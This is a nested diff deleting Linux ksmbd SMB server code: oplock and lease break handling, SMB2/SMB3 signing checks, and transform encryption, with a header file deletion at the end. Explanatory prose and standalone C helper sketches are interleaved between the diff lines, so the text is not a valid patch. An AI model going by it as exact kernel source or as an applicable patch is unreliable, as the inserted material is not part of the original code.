+-static void smb20_oplock_break_ack(struct ksmbd_work *work)
+-{
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_file *fp;
+-	struct oplock_info *opinfo = NULL;
+-	__le32 err = 0;
+-	int ret = 0;
+-	u64 volatile_id, persistent_id;
+-	char req_oplevel = 0, rsp_oplevel = 0;
+-	unsigned int oplock_change_type;
+-
+-	volatile_id = req->VolatileFid;
+-	persistent_id = req->PersistentFid;
+-	req_oplevel = req->OplockLevel;
+-	ksmbd_debug(OPLOCK, "v_id %llu, p_id %llu request oplock level %d\n",
+-		    volatile_id, persistent_id, req_oplevel);
+-
+-	fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
+-	if (!fp) {
+-		rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		smb2_set_err_rsp(work);
+-		return;
+-	}
+-
+-	opinfo = opinfo_get(fp);
+-	if (!opinfo) {
+-		pr_err("unexpected null oplock_info\n");
+-		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		smb2_set_err_rsp(work);
+-		ksmbd_fd_put(work, fp);
+-		return;
+-	}
+-
+-	if (opinfo->level == SMB2_OPLOCK_LEVEL_NONE) {
+-		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		goto err_out;
+-	}
+-
+-	if (opinfo->op_state == OPLOCK_STATE_NONE) {
+-		ksmbd_debug(SMB, "unexpected oplock state 0x%x\n", opinfo->op_state);
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		goto err_out;
+-	}
+-
+-	if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
+-	     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
+-	    (req_oplevel != SMB2_OPLOCK_LEVEL_II &&
+-	     req_oplevel != SMB2_OPLOCK_LEVEL_NONE)) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		oplock_change_type = OPLOCK_WRITE_TO_NONE;
+-	} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
+-		   req_oplevel != SMB2_OPLOCK_LEVEL_NONE) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		oplock_change_type = OPLOCK_READ_TO_NONE;
+-	} else if (req_oplevel == SMB2_OPLOCK_LEVEL_II ||
+-		   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
+-		err = STATUS_INVALID_DEVICE_STATE;
+-		if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
+-		     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
+-		    req_oplevel == SMB2_OPLOCK_LEVEL_II) {
+-			oplock_change_type = OPLOCK_WRITE_TO_READ;
+-		} else if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
+-			    opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
+-			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
+-			oplock_change_type = OPLOCK_WRITE_TO_NONE;
+-		} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
+-			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
+-			oplock_change_type = OPLOCK_READ_TO_NONE;
+-		} else {
+-			oplock_change_type = 0;
+-		}
+-	} else {
+-		oplock_change_type = 0;
+-	}
+-
+-	switch (oplock_change_type) {
+-	case OPLOCK_WRITE_TO_READ:
+-		ret = opinfo_write_to_read(opinfo);
+-		rsp_oplevel = SMB2_OPLOCK_LEVEL_II;
+-		break;
+-	case OPLOCK_WRITE_TO_NONE:
+-		ret = opinfo_write_to_none(opinfo);
+-		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
+-		break;
+-	case OPLOCK_READ_TO_NONE:
+-		ret = opinfo_read_to_none(opinfo);
+-		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
+-		break;
+-	default:
+-		pr_err("unknown oplock change 0x%x -> 0x%x\n",
+-		       opinfo->level, rsp_oplevel);
+-	}
+-
+-	if (ret < 0) {
+-		rsp->hdr.Status = err;
+-		goto err_out;
+-	}
+-
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-	opinfo_put(opinfo);
+-	ksmbd_fd_put(work, fp);
+-
+-	rsp->StructureSize = cpu_to_le16(24);
+-	rsp->OplockLevel = rsp_oplevel;
+-	rsp->Reserved = 0;
+-	rsp->Reserved2 = 0;
+-	rsp->VolatileFid = volatile_id;
+-	rsp->PersistentFid = persistent_id;
+-	inc_rfc1001_len(work->response_buf, 24);
+-	return;
+-
+-err_out:
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-
+-	opinfo_put(opinfo);
+-	ksmbd_fd_put(work, fp);
+-	smb2_set_err_rsp(work);
+-}
+-
+-static int check_lease_state(struct lease *lease, __le32 req_state)
+-{
+-	if ((lease->new_state ==
+-	     (SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE)) &&
+-	    !(req_state & SMB2_LEASE_WRITE_CACHING_LE)) {
+-		lease->new_state = req_state;
+-		return 0;
+-	}
+-
+-	if (lease->new_state == req_state)
+-		return 0;
+-
+-	return 1;
+-}
+-
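check_lease_state() tolerates exactly one mismatch: when the server asked for read+handle caching, any acknowledgment that drops write caching is accepted as-is; otherwise the acked state must equal the requested one. With the SMB2 wire values for the lease flags, that rule reduces to:

#include <stdbool.h>
#include <stdint.h>

#define LEASE_R 0x01	/* SMB2_LEASE_READ_CACHING   */
#define LEASE_H 0x02	/* SMB2_LEASE_HANDLE_CACHING */
#define LEASE_W 0x04	/* SMB2_LEASE_WRITE_CACHING  */

static bool lease_ack_acceptable(uint32_t requested, uint32_t acked)
{
	if (requested == (LEASE_R | LEASE_H) && !(acked & LEASE_W))
		return true;	/* RH break: any non-write subset is fine */
	return requested == acked;
}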
+-/**
+- * smb21_lease_break_ack() - handler for smb2.1 lease break command
+- * @work:	smb work containing lease break command buffer
+- *
+- * Return:	none
+- */
+-static void smb21_lease_break_ack(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_lease_ack *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lease_ack *rsp = smb2_get_msg(work->response_buf);
+-	struct oplock_info *opinfo;
+-	__le32 err = 0;
+-	int ret = 0;
+-	unsigned int lease_change_type;
+-	__le32 lease_state;
+-	struct lease *lease;
+-
+-	ksmbd_debug(OPLOCK, "smb21 lease break, lease state(0x%x)\n",
+-		    le32_to_cpu(req->LeaseState));
+-	opinfo = lookup_lease_in_table(conn, req->LeaseKey);
+-	if (!opinfo) {
+-		ksmbd_debug(OPLOCK, "file not opened\n");
+-		smb2_set_err_rsp(work);
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		return;
+-	}
+-	lease = opinfo->o_lease;
+-
+-	if (opinfo->op_state == OPLOCK_STATE_NONE) {
+-		pr_err("unexpected lease break state 0x%x\n",
+-		       opinfo->op_state);
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		goto err_out;
+-	}
+-
+-	if (check_lease_state(lease, req->LeaseState)) {
+-		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
+-		ksmbd_debug(OPLOCK,
+-			    "req lease state: 0x%x, expected state: 0x%x\n",
+-			    req->LeaseState, lease->new_state);
+-		goto err_out;
+-	}
+-
+-	if (!atomic_read(&opinfo->breaking_cnt)) {
+-		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
+-		goto err_out;
+-	}
+-
+-	/* check for bad lease state */
+-	if (req->LeaseState &
+-	    (~(SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE))) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-			lease_change_type = OPLOCK_WRITE_TO_NONE;
+-		else
+-			lease_change_type = OPLOCK_READ_TO_NONE;
+-		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
+-			    le32_to_cpu(lease->state),
+-			    le32_to_cpu(req->LeaseState));
+-	} else if (lease->state == SMB2_LEASE_READ_CACHING_LE &&
+-		   req->LeaseState != SMB2_LEASE_NONE_LE) {
+-		err = STATUS_INVALID_OPLOCK_PROTOCOL;
+-		lease_change_type = OPLOCK_READ_TO_NONE;
+-		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
+-			    le32_to_cpu(lease->state),
+-			    le32_to_cpu(req->LeaseState));
+-	} else {
+-		/* valid lease state changes */
+-		err = STATUS_INVALID_DEVICE_STATE;
+-		if (req->LeaseState == SMB2_LEASE_NONE_LE) {
+-			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-				lease_change_type = OPLOCK_WRITE_TO_NONE;
+-			else
+-				lease_change_type = OPLOCK_READ_TO_NONE;
+-		} else if (req->LeaseState & SMB2_LEASE_READ_CACHING_LE) {
+-			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-				lease_change_type = OPLOCK_WRITE_TO_READ;
+-			else
+-				lease_change_type = OPLOCK_READ_HANDLE_TO_READ;
+-		} else {
+-			lease_change_type = 0;
+-		}
+-	}
+-
+-	switch (lease_change_type) {
+-	case OPLOCK_WRITE_TO_READ:
+-		ret = opinfo_write_to_read(opinfo);
+-		break;
+-	case OPLOCK_READ_HANDLE_TO_READ:
+-		ret = opinfo_read_handle_to_read(opinfo);
+-		break;
+-	case OPLOCK_WRITE_TO_NONE:
+-		ret = opinfo_write_to_none(opinfo);
+-		break;
+-	case OPLOCK_READ_TO_NONE:
+-		ret = opinfo_read_to_none(opinfo);
+-		break;
+-	default:
+-		ksmbd_debug(OPLOCK, "unknown lease change 0x%x -> 0x%x\n",
+-			    le32_to_cpu(lease->state),
+-			    le32_to_cpu(req->LeaseState));
+-	}
+-
+-	lease_state = lease->state;
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-	atomic_dec(&opinfo->breaking_cnt);
+-	wake_up_interruptible_all(&opinfo->oplock_brk);
+-	opinfo_put(opinfo);
+-
+-	if (ret < 0) {
+-		rsp->hdr.Status = err;
+-		goto err_out;
+-	}
+-
+-	rsp->StructureSize = cpu_to_le16(36);
+-	rsp->Reserved = 0;
+-	rsp->Flags = 0;
+-	memcpy(rsp->LeaseKey, req->LeaseKey, 16);
+-	rsp->LeaseState = lease_state;
+-	rsp->LeaseDuration = 0;
+-	inc_rfc1001_len(work->response_buf, 36);
+-	return;
+-
+-err_out:
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+-	wake_up_interruptible_all(&opinfo->oplock_q);
+-	atomic_dec(&opinfo->breaking_cnt);
+-	wake_up_interruptible_all(&opinfo->oplock_brk);
+-
+-	opinfo_put(opinfo);
+-	smb2_set_err_rsp(work);
+-}
+-
+-/**
+- * smb2_oplock_break() - dispatcher for smb2.0 and 2.1 oplock/lease break
+- * @work:	smb work containing oplock/lease break command buffer
+- *
+- * Return:	0
+- */
+-int smb2_oplock_break(struct ksmbd_work *work)
+-{
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
+-
+-	switch (le16_to_cpu(req->StructureSize)) {
+-	case OP_BREAK_STRUCT_SIZE_20:
+-		smb20_oplock_break_ack(work);
+-		break;
+-	case OP_BREAK_STRUCT_SIZE_21:
+-		smb21_lease_break_ack(work);
+-		break;
+-	default:
+-		ksmbd_debug(OPLOCK, "invalid break cmd %d\n",
+-			    le16_to_cpu(req->StructureSize));
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		smb2_set_err_rsp(work);
+-	}
+-
+-	return 0;
+-}
+-
+-/**
+- * smb2_notify() - handler for smb2 notify request
+- * @work:   smb work containing notify command buffer
+- *
+- * Return:      0
+- */
+-int smb2_notify(struct ksmbd_work *work)
+-{
+-	struct smb2_change_notify_req *req;
+-	struct smb2_change_notify_rsp *rsp;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (work->next_smb2_rcv_hdr_off && req->hdr.NextCommand) {
+-		rsp->hdr.Status = STATUS_INTERNAL_ERROR;
+-		smb2_set_err_rsp(work);
+-		return 0;
+-	}
+-
+-	smb2_set_err_rsp(work);
+-	rsp->hdr.Status = STATUS_NOT_IMPLEMENTED;
+-	return 0;
+-}
+-
+-/**
+- * smb2_is_sign_req() - handler for checking packet signing status
+- * @work:	smb work containing the request buffer
+- * @command:	SMB2 command id
+- *
+- * Return:	true if the packet is signed, false otherwise
+- */
+-bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command)
+-{
+-	struct smb2_hdr *rcv_hdr2 = smb2_get_msg(work->request_buf);
+-
+-	if ((rcv_hdr2->Flags & SMB2_FLAGS_SIGNED) &&
+-	    command != SMB2_NEGOTIATE_HE &&
+-	    command != SMB2_SESSION_SETUP_HE &&
+-	    command != SMB2_OPLOCK_BREAK_HE)
+-		return true;
+-
+-	return false;
+-}
+-
+-/**
+- * smb2_check_sign_req() - handler for req packet sign processing
+- * @work:   smb work containing the request buffer
+- *
+- * Return:	1 on success, 0 otherwise
+- */
+-int smb2_check_sign_req(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr;
+-	char signature_req[SMB2_SIGNATURE_SIZE];
+-	char signature[SMB2_HMACSHA256_SIZE];
+-	struct kvec iov[1];
+-	size_t len;
+-
+-	hdr = smb2_get_msg(work->request_buf);
+-	if (work->next_smb2_rcv_hdr_off)
+-		hdr = ksmbd_req_buf_next(work);
+-
+-	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
+-		len = get_rfc1002_len(work->request_buf);
+-	else if (hdr->NextCommand)
+-		len = le32_to_cpu(hdr->NextCommand);
+-	else
+-		len = get_rfc1002_len(work->request_buf) -
+-			work->next_smb2_rcv_hdr_off;
+-
+-	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, 1,
+-				signature))
+-		return 0;
+-
+-	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
+-		pr_err("bad smb2 signature\n");
+-		return 0;
+-	}
+-
+-	return 1;
+-}
+-
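The SMB2 signature is HMAC-SHA256 over the whole PDU, computed with the 16-byte Signature field zeroed and then truncated to 16 bytes. A hedged OpenSSL sketch of the same verification (the signature offset is passed in rather than derived from a real header layout):

#include <openssl/crypto.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <string.h>

#define SMB2_SIG_SIZE 16

static int smb2_signature_ok(const unsigned char *key, size_t key_len,
			     unsigned char *pdu, size_t pdu_len,
			     size_t sig_off)
{
	unsigned char want[SMB2_SIG_SIZE], mac[EVP_MAX_MD_SIZE];
	unsigned int mac_len = 0;
	int ok;

	if (sig_off + SMB2_SIG_SIZE > pdu_len)
		return 0;

	memcpy(want, pdu + sig_off, SMB2_SIG_SIZE);
	memset(pdu + sig_off, 0, SMB2_SIG_SIZE);	/* sign with field zeroed */

	ok = HMAC(EVP_sha256(), key, (int)key_len, pdu, pdu_len,
		  mac, &mac_len) != NULL &&
	     mac_len >= SMB2_SIG_SIZE &&
	     CRYPTO_memcmp(mac, want, SMB2_SIG_SIZE) == 0;

	memcpy(pdu + sig_off, want, SMB2_SIG_SIZE);	/* restore the PDU */
	return ok;
}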
+-/**
+- * smb2_set_sign_rsp() - handler for rsp packet sign processing
+- * @work:   smb work containing the response buffer
+- *
+- */
+-void smb2_set_sign_rsp(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *hdr;
+-	struct smb2_hdr *req_hdr;
+-	char signature[SMB2_HMACSHA256_SIZE];
+-	struct kvec iov[2];
+-	size_t len;
+-	int n_vec = 1;
+-
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
+-
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
+-	hdr->Flags |= SMB2_FLAGS_SIGNED;
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
+-		n_vec++;
+-	}
+-
+-	if (!ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, n_vec,
+-				 signature))
+-		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
+-}
+-
+-/**
+- * smb3_check_sign_req() - handler for req packet sign processing
+- * @work:   smb work containing the request buffer
+- *
+- * Return:	1 on success, 0 otherwise
+- */
+-int smb3_check_sign_req(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	char *signing_key;
+-	struct smb2_hdr *hdr;
+-	struct channel *chann;
+-	char signature_req[SMB2_SIGNATURE_SIZE];
+-	char signature[SMB2_CMACAES_SIZE];
+-	struct kvec iov[1];
+-	size_t len;
+-
+-	hdr = smb2_get_msg(work->request_buf);
+-	if (work->next_smb2_rcv_hdr_off)
+-		hdr = ksmbd_req_buf_next(work);
+-
+-	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
+-		len = get_rfc1002_len(work->request_buf);
+-	else if (hdr->NextCommand)
+-		len = le32_to_cpu(hdr->NextCommand);
+-	else
+-		len = get_rfc1002_len(work->request_buf) -
+-			work->next_smb2_rcv_hdr_off;
+-
+-	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+-		signing_key = work->sess->smb3signingkey;
+-	} else {
+-		chann = lookup_chann_list(work->sess, conn);
+-		if (!chann) {
+-			return 0;
+-		}
+-		signing_key = chann->smb3signingkey;
+-	}
+-
+-	if (!signing_key) {
+-		pr_err("SMB3 signing key is not generated\n");
+-		return 0;
+-	}
+-
+-	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (ksmbd_sign_smb3_pdu(conn, signing_key, iov, 1, signature))
+-		return 0;
+-
+-	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
+-		pr_err("bad smb2 signature\n");
+-		return 0;
+-	}
+-
+-	return 1;
+-}
+-
+-/**
+- * smb3_set_sign_rsp() - handler for rsp packet sign processing
+- * @work:   smb work containing the response buffer
+- *
+- */
+-void smb3_set_sign_rsp(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *req_hdr, *hdr;
+-	struct channel *chann;
+-	char signature[SMB2_CMACAES_SIZE];
+-	struct kvec iov[2];
+-	int n_vec = 1;
+-	size_t len;
+-	char *signing_key;
+-
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
+-
+-	if (!conn->binding &&
+-	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+-		signing_key = work->sess->smb3signingkey;
+-	} else {
+-		chann = lookup_chann_list(work->sess, work->conn);
+-		if (!chann) {
+-			return;
+-		}
+-		signing_key = chann->smb3signingkey;
+-	}
+-
+-	if (!signing_key)
+-		return;
+-
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
+-	hdr->Flags |= SMB2_FLAGS_SIGNED;
+-	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
+-		n_vec++;
+-	}
+-
+-	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec, signature))
+-		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
+-}
+-
+-/**
+- * smb3_preauth_hash_rsp() - handler for computing preauth hash on response
+- * @work:   smb work containing response buffer
+- *
+- */
+-void smb3_preauth_hash_rsp(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct smb2_hdr *req, *rsp;
+-
+-	if (conn->dialect != SMB311_PROT_ID)
+-		return;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (le16_to_cpu(req->Command) == SMB2_NEGOTIATE_HE &&
+-	    conn->preauth_info)
+-		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
+-						 conn->preauth_info->Preauth_HashValue);
+-
+-	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE && sess) {
+-		__u8 *hash_value;
+-
+-		if (conn->binding) {
+-			struct preauth_session *preauth_sess;
+-
+-			preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
+-			if (!preauth_sess)
+-				return;
+-			hash_value = preauth_sess->Preauth_HashValue;
+-		} else {
+-			hash_value = sess->Preauth_HashValue;
+-			if (!hash_value)
+-				return;
+-		}
+-		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
+-						 hash_value);
+-	}
+-}
+-
+-static void fill_transform_hdr(void *tr_buf, char *old_buf, __le16 cipher_type)
+-{
+-	struct smb2_transform_hdr *tr_hdr = tr_buf + 4;
+-	struct smb2_hdr *hdr = smb2_get_msg(old_buf);
+-	unsigned int orig_len = get_rfc1002_len(old_buf);
+-
+-	/* tr_buf must be cleared by the caller */
+-	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
+-	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
+-	tr_hdr->Flags = cpu_to_le16(TRANSFORM_FLAG_ENCRYPTED);
+-	if (cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	else
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	memcpy(&tr_hdr->SessionId, &hdr->SessionId, 8);
+-	inc_rfc1001_len(tr_buf, sizeof(struct smb2_transform_hdr));
+-	inc_rfc1001_len(tr_buf, orig_len);
+-}
+-
+-int smb3_encrypt_resp(struct ksmbd_work *work)
+-{
+-	char *buf = work->response_buf;
+-	struct kvec iov[3];
+-	int rc = -ENOMEM;
+-	int buf_size = 0, rq_nvec = 2 + (work->aux_payload_sz ? 1 : 0);
+-
+-	if (ARRAY_SIZE(iov) < rq_nvec)
+-		return -ENOMEM;
+-
+-	work->tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
+-	if (!work->tr_buf)
+-		return rc;
+-
+-	/* fill transform header */
+-	fill_transform_hdr(work->tr_buf, buf, work->conn->cipher_type);
+-
+-	iov[0].iov_base = work->tr_buf;
+-	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
+-	buf_size += iov[0].iov_len - 4;
+-
+-	iov[1].iov_base = buf + 4;
+-	iov[1].iov_len = get_rfc1002_len(buf);
+-	if (work->aux_payload_sz) {
+-		iov[1].iov_len = work->resp_hdr_sz - 4;
+-
+-		iov[2].iov_base = work->aux_payload_buf;
+-		iov[2].iov_len = work->aux_payload_sz;
+-		buf_size += iov[2].iov_len;
+-	}
+-	buf_size += iov[1].iov_len;
+-	work->resp_hdr_sz = iov[1].iov_len;
+-
+-	rc = ksmbd_crypt_message(work, iov, rq_nvec, 1);
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf, iov[1].iov_base, iov[1].iov_len);
+-	*(__be32 *)work->tr_buf = cpu_to_be32(buf_size);
+-
+-	return rc;
+-}
+-
+-bool smb3_is_transform_hdr(void *buf)
+-{
+-	struct smb2_transform_hdr *trhdr = smb2_get_msg(buf);
+-
+-	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
+-}
+-
+-int smb3_decrypt_req(struct ksmbd_work *work)
+-{
+-	struct ksmbd_session *sess;
+-	char *buf = work->request_buf;
+-	unsigned int pdu_length = get_rfc1002_len(buf);
+-	struct kvec iov[2];
+-	int buf_data_size = pdu_length - sizeof(struct smb2_transform_hdr);
+-	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(buf);
+-	int rc = 0;
+-
+-	if (buf_data_size < sizeof(struct smb2_hdr)) {
+-		pr_err("Transform message is too small (%u)\n",
+-		       pdu_length);
+-		return -ECONNABORTED;
+-	}
+-
+-	if (buf_data_size < le32_to_cpu(tr_hdr->OriginalMessageSize)) {
+-		pr_err("Transform message is broken\n");
+-		return -ECONNABORTED;
+-	}
+-
+-	sess = ksmbd_session_lookup_all(work->conn, le64_to_cpu(tr_hdr->SessionId));
+-	if (!sess) {
+-		pr_err("invalid session id(%llx) in transform header\n",
+-		       le64_to_cpu(tr_hdr->SessionId));
+-		return -ECONNABORTED;
+-	}
+-
+-	iov[0].iov_base = buf;
+-	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
+-	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr) + 4;
+-	iov[1].iov_len = buf_data_size;
+-	rc = ksmbd_crypt_message(work, iov, 2, 0);
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf + 4, iov[1].iov_base, buf_data_size);
+-	*(__be32 *)buf = cpu_to_be32(buf_data_size);
+-
+-	return rc;
+-}
+-
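Before decrypting, smb3_decrypt_req() insists the ciphertext is large enough to contain an SMB2 header and at least OriginalMessageSize bytes. Restated with explicit unsigned arithmetic (52 is the size of smb2_transform_hdr in this tree and 64 the size of smb2_hdr; treat both constants as assumptions):

#include <stdbool.h>
#include <stdint.h>

#define TRANSFORM_HDR_LEN 52	/* sizeof(struct smb2_transform_hdr), assumed */
#define SMB2_HDR_LEN	  64	/* sizeof(struct smb2_hdr), assumed */

static bool transform_pdu_sane(uint32_t pdu_len, uint32_t orig_msg_size)
{
	uint32_t ciphertext;

	if (pdu_len < TRANSFORM_HDR_LEN)
		return false;
	ciphertext = pdu_len - TRANSFORM_HDR_LEN;
	return ciphertext >= SMB2_HDR_LEN && ciphertext >= orig_msg_size;
}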
+-bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct smb2_hdr *rsp = smb2_get_msg(work->response_buf);
+-
+-	if (conn->dialect < SMB30_PROT_ID)
+-		return false;
+-
+-	if (work->next_smb2_rcv_hdr_off)
+-		rsp = ksmbd_resp_buf_next(work);
+-
+-	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE &&
+-	    sess->user && !user_guest(sess->user) &&
+-	    rsp->Status == STATUS_SUCCESS)
+-		return true;
+-	return false;
+-}
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+deleted file mode 100644
+index dd10f8031606b..0000000000000
+--- a/fs/ksmbd/smb2pdu.h
++++ /dev/null
+@@ -1,536 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef _SMB2PDU_H
+-#define _SMB2PDU_H
+-
+-#include "ntlmssp.h"
+-#include "smbacl.h"
+-
+-/* Create Action Flags */
+-#define FILE_SUPERSEDED                0x00000000
+-#define FILE_OPENED            0x00000001
+-#define FILE_CREATED           0x00000002
+-#define FILE_OVERWRITTEN       0x00000003
+-
+-/* SMB2 Max Credits */
+-#define SMB2_MAX_CREDITS		8192
+-
+-/* BB FIXME - analyze following length BB */
+-#define MAX_SMB2_HDR_SIZE 0x78 /* 4 len + 64 hdr + (2*24 wct) + 2 bct + 2 pad */
+-
+-#define SMB21_DEFAULT_IOSIZE	(1024 * 1024)
+-#define SMB3_DEFAULT_TRANS_SIZE	(1024 * 1024)
+-#define SMB3_MIN_IOSIZE		(64 * 1024)
+-#define SMB3_MAX_IOSIZE		(8 * 1024 * 1024)
+-#define SMB3_MAX_MSGSIZE	(4 * 4096)
+-
+-/*
+- *	Definitions for SMB2 Protocol Data Units (network frames)
+- *
+- *  See MS-SMB2.PDF specification for protocol details.
+- *  The naming convention is the lower-case version of the SMB2
